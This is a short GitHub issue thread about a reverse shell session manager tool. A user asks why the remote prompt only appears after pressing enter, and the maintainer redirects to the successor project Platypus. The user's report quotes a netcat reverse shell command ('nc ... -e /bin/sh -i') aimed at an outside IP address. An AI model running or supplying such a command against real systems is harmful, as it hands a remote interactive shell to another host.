WangYihang / Reverse-Shell-Manager

:hammer: A multiple reverse shell session/client manager via terminal
https://github.com/WangYihang/Platypus
238 stars 66 forks source link

Add interactive shell support (/bin/sh -i) #9

Closed teopost closed 5 years ago

teopost commented 5 years ago

Hi, I use this command in the client nc 81.4.122.47 4444 -e /bin/sh -i, because I would like to show the prompt in the server output, but something seem not work. The remote prompt appear only when I push enter on keyboard.

Before I push enter

image

After I push enter

image

This behavior can be improved?

teopost commented 5 years ago

Resolved by Platypus

WangYihang commented 5 years ago

Okay, thank you for reporting, this project will not develop anymore. please refer to this project (https://github.com/WangYihang/Platypus), next generation of the reverse shell sessions manager. If you get any problems while using the next generation, please feel free to open an issue.